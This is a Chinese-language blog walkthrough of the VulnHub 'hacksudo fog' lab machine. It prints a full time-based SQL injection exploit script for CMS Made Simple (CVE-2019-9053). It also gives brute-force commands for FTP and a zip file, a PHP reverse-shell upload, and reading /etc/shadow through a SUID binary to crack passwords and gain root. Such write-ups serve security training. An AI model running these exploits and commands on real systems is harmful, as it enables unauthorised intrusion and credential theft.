hacksudo-fog靶场笔记
环境搭建:
靶机: vulnhub-hacksudo fog(https://download.vulnhub.com/hacksudo/hacksudo-FOG.zip)
攻击机: kali 2021系统
信息收集
渗透第一步,信息收集少不了,先通过获取靶机Mac地址进行获取IP,实在不行就利用单用户进入
arp-scan工具开路,发现靶机IP地址为172.16.10.146
apl
进一步全部信息探测--nmap
nmap -n -p- -A 172.16.10.146
得到许多关键信息、开放了21、22、80、3306端口,对应着服务可能存在渗透点
目录爆破
尝试先从80端口入手,利用gobuster进行爆破目录
https://blog.csdn.net/qq_22597955/article/details/118553139 安装gobuster工具博客
apl
gobuster dir -u http://172.16.10.146/ -t 24 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x php,txt,html
方法二:也可以利用dirb工具爆破,利用自带字典爆破,得到关键信息
dirb http://172.16.10.146/ /usr/share/wordlists/dirb/big.txt -X .php,.txt,.html
发现dict.txt,访问一下为字典文件,将其下载下来查看
线索探测
弄到字典后,猜测应该是密码字典,那么用户名怎么发现呢?会不会存在用户字典!再上浏览器找找线索。
访问主网站,查看源代码,发现index1.html
继续访问index1.html,源代码中发现网址(https://github.com/hacksudo/SoundStegno)
下载网址,发现一个音频文件提取信息工具SoundStegno.git
将其下载下来,得到SoundStegno.py 脚本文件,利用它进行后面解密
访问cms
poc利用
利用whatweb进行网站指纹探测,发现CMS版本号 (CMS-Made-Simple[2.2.5])
搜寻可利用poc,利用kali自带的 searchsploit工具
searchsploit CMS Made Simple 2.2.5
searchsploit -m php/webapps/46635.py
尝试用python2执行此脚本,发现不存在termcolor模块,尝试下载未果,索性修改脚本,或作python3
这里附上脚本,修改部分主要为输出语句即可成功利用
```python
!/usr/bin/env python
Exploit Title: Unauthenticated SQL Injection on CMS Made Simple <= 2.2.9
Date: 30-03-2019
Exploit Author: Daniele Scanu @ Certimeter Group
Vendor Homepage: https://www.cmsmadesimple.org/
Software Link: https://www.cmsmadesimple.org/downloads/cmsms/
Version: <= 2.2.9
Tested on: Ubuntu 18.04 LTS
CVE : CVE-2019-9053
import requests
from termcolor import colored
import time
from termcolor import cprint
import optparse
import hashlib
parser = optparse.OptionParser()
parser.add_option('-u', '--url', action="store", dest="url", help="Base target uri (ex. http://10.10.10.100/cms)")
parser.add_option('-w', '--wordlist', action="store", dest="wordlist", help="Wordlist for crack admin password")
parser.add_option('-c', '--crack', action="store_true", dest="cracking", help="Crack password with wordlist", default=False)
options, args = parser.parse_args()
if not options.url:
print ("[+] Specify an url target")
print ("[+] Example usage (no cracking password): exploit.py -u http://target-uri")
print ("[+] Example usage (with cracking password): exploit.py -u http://target-uri --crack -w /path-wordlist")
print ("[+] Setup the variable TIME with an appropriate time, because this sql injection is a time based.")
exit()
url_vuln = options.url + '/moduleinterface.php?mact=News,m1_,default,0'
session = requests.Session()
dictionary = '1234567890qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM@._-$'
flag = True
password = ""
temp_password = ""
TIME = 1
db_name = ""
output = ""
email = ""
salt = ''
wordlist = ""
if options.wordlist:
wordlist += options.wordlist
def crack_password():
global password
global output
global wordlist
global salt
dict = open(wordlist)
for line in dict.readlines():
line = line.replace("\n", "")
beautify_print_try(line)
if hashlib.md5(str(salt) + line).hexdigest() == password:
output += "\n[+] Password cracked: " + line
break
dict.close()
def beautify_print_try(value):
global output
print ("\033c")
cprint(output,'green', attrs=['bold'])
cprint('[*] Try: ' + value, 'red', attrs=['bold'])
def beautify_print():
global output
print ("\033c")
cprint(output,'green', attrs=['bold'])
def dump_salt():
global flag
global salt
global output
ord_salt = ""
ord_salt_temp = ""
while flag:
flag = False
for i in range(0, len(dictionary)):
temp_salt = salt + dictionary[i]
ord_salt_temp = ord_salt + hex(ord(dictionary[i]))[2:]
beautify_print_try(temp_salt)
payload = "a,b,1,5))+and+(select+sleep(" + str(TIME) + ")+from+cms_siteprefs+where+sitepref_value+like+0x" + ord_salt_temp + "25+and+sitepref_name+like+0x736974656d61736b)+--+"
url = url_vuln + "&m1_idlist=" + payload
start_time = time.time()
r = session.get(url)
elapsed_time = time.time() - start_time
if elapsed_time >= TIME:
flag = True
break
if flag:
salt = temp_salt
ord_salt = ord_salt_temp
flag = True
output += '\n[+] Salt for password found: ' + salt
def dump_password():
global flag
global password
global output
ord_password = ""
ord_password_temp = ""
while flag:
flag = False
for i in range(0, len(dictionary)):
temp_password = password + dictionary[i]
ord_password_temp = ord_password + hex(ord(dictionary[i]))[2:]
beautify_print_try(temp_password)
payload = "a,b,1,5))+and+(select+sleep(" + str(TIME) + ")+from+cms_users"
payload += "+where+password+like+0x" + ord_password_temp + "25+and+user_id+like+0x31)+--+"
url = url_vuln + "&m1_idlist=" + payload
start_time = time.time()
r = session.get(url)
elapsed_time = time.time() - start_time
if elapsed_time >= TIME:
flag = True
break
if flag:
password = temp_password
ord_password = ord_password_temp
flag = True
output += '\n[+] Password found: ' + password
def dump_username():
global flag
global db_name
global output
ord_db_name = ""
ord_db_name_temp = ""
while flag:
flag = False
for i in range(0, len(dictionary)):
temp_db_name = db_name + dictionary[i]
ord_db_name_temp = ord_db_name + hex(ord(dictionary[i]))[2:]
beautify_print_try(temp_db_name)
payload = "a,b,1,5))+and+(select+sleep(" + str(TIME) + ")+from+cms_users+where+username+like+0x" + ord_db_name_temp + "25+and+user_id+like+0x31)+--+"
url = url_vuln + "&m1_idlist=" + payload
start_time = time.time()
r = session.get(url)
elapsed_time = time.time() - start_time
if elapsed_time >= TIME:
flag = True
break
if flag:
db_name = temp_db_name
ord_db_name = ord_db_name_temp
output += '\n[+] Username found: ' + db_name
flag = True
def dump_email():
global flag
global email
global output
ord_email = ""
ord_email_temp = ""
while flag:
flag = False
for i in range(0, len(dictionary)):
temp_email = email + dictionary[i]
ord_email_temp = ord_email + hex(ord(dictionary[i]))[2:]
beautify_print_try(temp_email)
payload = "a,b,1,5))+and+(select+sleep(" + str(TIME) + ")+from+cms_users+where+email+like+0x" + ord_email_temp + "25+and+user_id+like+0x31)+--+"
url = url_vuln + "&m1_idlist=" + payload
start_time = time.time()
r = session.get(url)
elapsed_time = time.time() - start_time
if elapsed_time >= TIME:
flag = True
break
if flag:
email = temp_email
ord_email = ord_email_temp
output += '\n[+] Email found: ' + email
flag = True
dump_salt()
dump_username()
dump_email()
dump_password()
if options.cracking:
print (colored("[*] Now try to crack password"))
crack_password()
beautify_print()
```
python
利用poc,获取到用户名hacksudo及hash
python3 46635.py -u http://172.16.10.146/cms/
hydra爆破
利用已知的用户名+字典文件,爆破ftp服务,成功得到用户名和密码
abap
hydra -l hacksudo -P /root/dict.txt -t 32 172.16.10.146 ftp
爆破成功,有点小舒服,利用用户和密码成功登录ftp
发现flag1和目录hacksudo_ISRO_bak, 将其全部下载下来继续分析
发现secr3tSteg.zip,疑似隐写的文件,尝试解压,居然需要密码。。
查看另外两个文件,也没发现什么有用的信息
apl
再次爆破,利用字典库拿下zip
zip2john secr3tSteg.zip > hash
zcat /usr/share/wordlists/rockyou.txt.gz > zidian.txt
john --wordlist=zidian.txt hash
音频解密
拿下secr3tSteg.zip密码为fooled,成功解压,舒服辽,下载到一个wav文件,这不正是音频吗!
破解音频文件,得到一串加密文件
python ExWave.py -f hacksudoSTEGNO.wav
看到这串加密,愣是想了挺久,不知道是啥,只好百度了,得到答案,居然是凯撒加密!上网站解密
得到Username=fog:password=hacksudoISRO,OK,又拿到新的信息
Getshell
apl
通过前面发现,进行尝试,发现可以利用此用户fog和密码hacksudoISRO登录后台
进入后台后,寻找getshell点,发现存在文件上传
尝试过后发现该CMS有有一个文件上传后的解析漏洞,可以上传phtml进行反弹木马,利用kali自带的反弹木马
cp /usr/share/webshells/php/php-reverse-shell.php
将其改名为phtml,并更改其文件内容
kali方向监听1234端口,访问反弹木马文件,成功getshell
提权
利用靶机,搜索可利用suid提权,发现两个能够提权的方法 look提权和sudo提权
find / -perm -u=s 2>/dev/null
利用高权限look命令进行读取系统的shadow文件
look '' /etc/shadow
john(开膛手约翰)进行破解hash,得到isro用户密码
切换isro用户,继续干
寻找提权点,搜索可利用高权限用户提权
切换到/home/isro/fog目录,发现可执行文件
执行fog文件,利用os模块成功提权为root,拿到root下的flag
总结:渗透靶机的过程中,还是存在需要不足点,需要加强,也算是有所体会,工具爆破还得多学学,攻打hacksudo系列靶机还是不错的,后面还会继续,望大佬们多多支持!
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论